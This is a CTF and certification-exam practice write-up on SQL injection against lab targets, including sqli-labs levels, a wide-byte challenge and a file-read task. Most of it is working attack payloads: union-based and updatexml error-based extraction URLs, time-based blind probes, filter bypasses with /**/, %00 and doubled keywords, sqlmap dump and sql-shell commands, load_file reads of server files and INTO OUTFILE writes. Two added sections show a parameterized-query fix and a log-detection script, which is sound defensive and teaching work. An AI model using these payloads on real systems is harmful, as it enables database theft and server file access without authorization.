【CISP-PTE】SQL injection practice problems
1. This year's Spring Festival is different from years past
http://140.210.203.168:28881

1.1 Manual injection

The challenge states explicitly that the comment characters # and -- are filtered, so the injection closes the single quote and works around the missing comment by ending each payload with and 1='1 or or 1='1, which consumes the application's own closing quote.

1) Closing the quote

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1=1

Echoed SQL:

select * from Article where uuid = '983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1'

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' and 1='1

Closed successfully.

2) Finding the column count (trying counts one by one)

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5 or 1='1

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,2,3,4,5,6 or 1='1

With 6 columns the page echoes field 2.

3) Dumping the database name

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,database(),3,4,5,6 or 1='1

The database name is 2web.

4) Dumping the tables

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='2web'),3,4,5,6 or 1='1

Two tables: Article and IS_KEY.

5) Dumping the columns of IS_KEY

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='2web' and table_name='IS_KEY'),3,4,5,6 and 1='1

The column is haha.

6) Dumping the field

http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6' union select 1,(select group_concat(haha) from IS_KEY ),3,4,5,6 and 1='1

Result: key1:abcd1234

1.2 sqlmap injection

Injection test:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5

Database:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 --current-db

Tables:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web --tables

Columns:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY --columns

Field:

python sqlmap.py -u "http://140.210.203.168:28881/start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6" --risk 3 --level 5 -D 2web -T IS_KEY -C "haha" --dump

2. Article publishing system

http://140.210.203.168:17111/admin.php

sqlmap injection

Database:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 --current-db

Tables:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web --tables

Columns:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 --columns

Field:

python sqlmap.py -u "http://140.210.203.168:17111/article.php?uid=1&title=2&content=3&name=4" --risk 3 --level 5 -D 2web -T users1 -C "XremarkX4354" --dump
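The reason the filter on # and -- in challenge 1 does not help is visible when the lookup is written out: the quote in the input ends the string literal, and whatever follows is parsed as SQL. The example below is added here and is not code from the challenge or its author; it uses Python and an in-memory SQLite database standing in for the PHP/MySQL application, with a constructed Article table of six columns and an IS_KEY table holding one constructed row, and feeds the exact step-6 input string to a string-built query and to a parameterized one.

```python
"""Vulnerable vs. parameterized lookup, modelled on the section 1.1 challenge.

Added example: the schema (Article with six columns, IS_KEY with a column
named haha) and the sample rows are constructed here to mirror the write-up;
nothing is taken from the challenge server or its code.
"""
import sqlite3

SAMPLE_UUID = "983fd952-df4e-4b63-946f-f2e6bb0327d6"

# The same input string that step 6 of the manual injection sends in the uuid
# parameter; no comment character is needed because the trailing and 1='1
# re-uses the application's own closing quote.
UNION_PAYLOAD = (
    SAMPLE_UUID
    + "' union select 1,(select group_concat(haha) from IS_KEY),3,4,5,6 and 1='1"
)


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database with the shape the write-up discovered."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Article(id INTEGER, uuid TEXT, title TEXT, body TEXT,
                             author TEXT, created TEXT);
        CREATE TABLE IS_KEY(haha TEXT);
        INSERT INTO Article VALUES (1, '983fd952-df4e-4b63-946f-f2e6bb0327d6',
                                    'Spring Festival', 'text', 'admin', '2022-01-31');
        INSERT INTO IS_KEY VALUES ('key1:abcd1234');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, uuid: str) -> list:
    """String-built query. A quote inside uuid ends the literal early and the
    rest of the input is executed as SQL, so a UNION can append rows from
    any table the database user can read."""
    sql = "select * from Article where uuid = '" + uuid + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, uuid: str) -> list:
    """Bound parameter. The SQL text is fixed; the driver passes uuid as a
    value, so quotes and keywords in it are compared, never parsed."""
    sql = "select * from Article where uuid = ?"
    return conn.execute(sql, (uuid,)).fetchall()


def second_column(rows: list) -> list:
    """Field 2 is what the challenge page echoes; collect it per row."""
    return [row[1] for row in rows]


if __name__ == "__main__":
    db = build_db()
    print("legit uuid, vulnerable:", second_column(lookup_vulnerable(db, SAMPLE_UUID)))
    print("payload, vulnerable:   ", second_column(lookup_vulnerable(db, UNION_PAYLOAD)))
    print("payload, bound:        ", second_column(lookup_parameterized(db, UNION_PAYLOAD)))
```

With the string-built query the echoed field 2 contains key1:abcd1234 alongside the real article; with the bound parameter the same input simply matches no row. Blacklisting comment characters, as the challenge does, changes nothing about this, because the fix has to be at the query-construction layer rather than in the input.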
3. Article publishing system 2

sqlmap injection and executing SQL through sql-shell

http://118.195.198.108:20000

Register a user, publish an article, capture the request and save it as sql.txt.

sqlmap database:

python sqlmap.py -r sql.txt --risk 3 --level 5 --current-db

Tables:

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web --tables

Columns:

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 --columns

Field:

python sqlmap.py -r sql.txt --risk 3 --level 5 -D 2web -T users1 -C "username,ox3a,password" --dump

The field cannot be dumped this way.

Summary of what has been obtained so far: database 2web, table users1, columns username and password.

Running a SQL shell from sqlmap:

python sqlmap.py -r sql.txt --sql-shell

select * from 2web.users1 limit 1

or

select * from 2web.users1 where username='admin'

Or run the query directly from sqlmap:

python sqlmap.py -r sql.txt --sql-query="select * from 2web.users1 limit 1"

4. [Chapter 1: web basics] SQL injection-1

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81

union-based injection

Closing the quote:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 #

# is filtered.

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 %23

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' and 1=1 --+

%23 and --+ are not filtered; closed successfully.

Column count:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 30 --+

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' order by 3 --+

The column count is 3.

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=1' union select 1,2,3 --+

The field count is 3.

Echo position:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,2,3 --+

Database:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,database(),3 --+

The database name is note.

Tables:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='note'),3 --+

Two tables: fl4g, notes.

Columns:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='note' and table_name='fl4g'),3 --+

The column name is fllllag.

Field value:

http://e095a0c6-58b8-4209-8473-2fdf51da60a8.node4.buuoj.cn:81/index.php?id=-1' union select 1,(select group_concat(fllllag) from fl4g),3 and 1=1 --+

Flag: n1book{union_select_is_so_cool}

5. sqlilabs 1-15

updatexml / extractvalue

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1

Closing the quote:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1 and 1=1 %23

# is filtered.

Error-based injection

Database:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1) %23

Tables:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),1) %23

Only one row is echoed at a time, so the tables are walked one by one with limit:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) %23
emails

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 2,1)),1) %23
uagents

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1)),1) %23
users

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1)),1) %23
referers

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 4,1)),1) %23
Empty, so there are only four tables.

Columns:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1)),1) %23

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),1) %23

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 2,1)),1) %23

Three columns: id, username, password.

Field contents:

http://b8000c37-69fc-40a6-93ea-e514de0e3550.node4.buuoj.cn/Less-1/?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users limit 0,1)),1) %23

XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

The echoed content is truncated, so the result is incomplete; see https://www.wolai.com/ctfhub/qXx5vurg8fRgasaZAVDo8W. The MID() function extracts characters from a text field:

SELECT MID(column_name,start[,length]) FROM table_name;

Less-1, string-type injection:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-1/?id=1' order by 5 --+

Less-2, numeric injection:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-2/?id=1 order by 5

Less-3, ') closure:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-3/?id=1') --+

Less-4, ") closure:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-4/?id=1") --+

Less-5, error-based injection:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-5/?id=1' and updatexml(1,concat(1,database()),1) --+

http://node2.anna.nssctf.cn:28656/Less-5/?id=1' and updatexml(1,concat(0x7e,(select email_id from emails limit 8,1)),1) --+

Less-6, error-based injection with " closure:

http://e5c058ea-f87a-4f30-9a4e-c2ee5a2cdee5.node4.buuoj.cn/Less-6/?id=1" and updatexml(1,concat(0x7e,database()),1)--+

Less-7, outfile:

Less-7/?id=-1' union select 1,2,@@datadir -- #   (get the data storage path)

Less-7/?id=-1' union select 1,2,@@basedir -- #   (get the install path)

Less-7/?id=1')) union select 1,2,3 into outfile "C:\phpStudy\WWW\sqli\Less-7\test.txt" -- #

sqlmap --sql-shell

Less-8, boolean-based blind: sqlmap

Less-9, time-based blind: sqlmap

?id=1' and sleep(5) -- -   (delays 5 s)
?id=1" and sleep(5) -- -
?id=1 and sleep(5) -- -
?id=1') and sleep(5) -- -
?id=1") and sleep(5) -- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -

Less-10, time-based blind: sqlmap

?id=1" and sleep(5) --+

Less-11, error-based injection:

' and updatexml(1,concat(0x7e,database()),0) #

Less-12, finding the closure:

") union select database(),2 #

Less-13, finding the closure:

1') or 1=1 #
1') and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

Less-14, finding the closure:

1" or 1=1 #
1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

6. Wide-byte injection: [极客大挑战 2019]HardSQL

http://8c4f169a-d2ef-4cdd-bd7f-74431c549dcc.node4.buuoj.cn:81/check.php?username=1&password=1%27or(updatexml(1,concat(0x7e,database()),1))%23

7. SQL file read

http://192.168.213.22:81

Read the file /tmp/360/key through the SQL injection; the answer is in that file.

Injection check:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1'

This errors, so an injection point exists. Echoed SQL:

select * from article where id= ('1'')

Closing: --+ and # are both filtered; ;%00 closes successfully.

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1');%00

Or (the space is filtered; use /**/ or %0a instead):

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1') /**/or/**/1=('1

Column count:

http://192.168.213.22:81/vulnerabilities/fu1.php?id=1')/**/order/**/by/**/4;%00

union echo: union is filtered; bypass by double writing.

http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,4;%00

Reading the key file (key:8b3h4a7v):

http://192.168.213.22:81/vulnerabilities/fu1.php?id=-1')/**/ununionion/**/select/**/1,2,3,load_file("/tmp/360/key");%00
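Every bypass in this write-up (URL-encoded quotes, %23 in place of #, /**/ in place of spaces, %00 to end the statement, ununionion to survive a keyword strip) leaves a recognisable trace in the web server's access log once the request is normalised the way the backend would see it. The following detection pass is an added example and not part of the original post: the access-log lines are constructed in Apache combined format to resemble the requests from sections 1, 5 and 7 plus a Less-9 time-blind probe, and the rule names, the normalisation steps and the choice of keywords to replay are this example's own.

```python
"""Log-side detection of the injection patterns in this write-up.

Added example, not from the page's author: the access-log lines below are
constructed in Apache combined format to resemble the requests shown in
sections 1, 5, 7 and the sqli-labs time-blind payloads; the rule set and
normalisation are this example's own choices.
"""
import re
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [31/Jan/2022:10:00:01 +0800] "GET /start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6 HTTP/1.1" 200 1532
10.0.0.9 - - [31/Jan/2022:10:00:07 +0800] "GET /start/index.php?uuid=983fd952-df4e-4b63-946f-f2e6bb0327d6%27%20union%20select%201,database(),3,4,5,6%20or%201=%271 HTTP/1.1" 200 1611
10.0.0.9 - - [31/Jan/2022:10:01:12 +0800] "GET /Less-1/?id=1%27%20and%20updatexml(1,concat(0x7e,database()),1)%20%23 HTTP/1.1" 200 790
10.0.0.9 - - [31/Jan/2022:10:02:40 +0800] "GET /vulnerabilities/fu1.php?id=-1%27)/**/ununionion/**/select/**/1,2,3,load_file(%22/tmp/360/key%22);%00 HTTP/1.1" 200 644
10.0.0.9 - - [31/Jan/2022:10:03:05 +0800] "GET /Less-9/?id=1%27%20and%20sleep(5)%20--%20- HTTP/1.1" 200 720
10.0.0.7 - - [31/Jan/2022:10:04:00 +0800] "GET /article.php?uid=1&title=Reunion%20notes&content=3&name=4 HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the normalised (decoded, comment-stripped, case-folded) target.
RULES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"information_schema\."),
    "error_based": re.compile(r"\b(?:updatexml|extractvalue)\s*\("),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b|@@(?:datadir|basedir)"),
    "time_based": re.compile(r"\b(?:sleep|benchmark)\s*\("),
}

# Keywords a naive blacklist deletes. The ununionion trick in section 7 relies on
# that deletion yielding the keyword, so the same deletion is replayed here and
# the rules are run on the result as well as on the raw normalised target.
STRIPPED_KEYWORDS = ("union", "select")


def normalize(target: str) -> str:
    """Undo the encodings used to slip past filters: (double) URL-decoding,
    /**/ comments used as spaces, %00 terminators, mixed case."""
    s = target
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = s.replace("\x00", " ")
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def matched_rules(target: str) -> list:
    """Names of rules that fire on the target or on any keyword-stripped variant."""
    base = normalize(target)
    variants = [base] + [base.replace(kw, "") for kw in STRIPPED_KEYWORDS]
    hits = {name for name, rx in RULES.items() if any(rx.search(v) for v in variants)}
    return sorted(hits)


def scan(log_text: str) -> list:
    """Return one finding per request whose target trips at least one rule."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rules = matched_rules(m["target"])
        if rules:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "rules": rules})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["ts"], f["rules"], f["target"][:60])
```

Four of the six constructed requests are flagged, all from the same client, and the benign "Reunion notes" title is not, because the keyword rule requires a word boundary and the replayed strip turns "reunion" into "re" rather than into a keyword. The normalisation has to mirror what the application actually decodes: if the backend does not double-decode, the second unquote_plus pass should be dropped so the detector does not see more than the parser does. For the file read in section 7 the durable control sits in the database rather than the log: MySQL's load_file() and INTO OUTFILE require the FILE privilege and are bounded by secure_file_priv, so a web application account without that privilege cannot reach /tmp/360/key regardless of how the query is smuggled in.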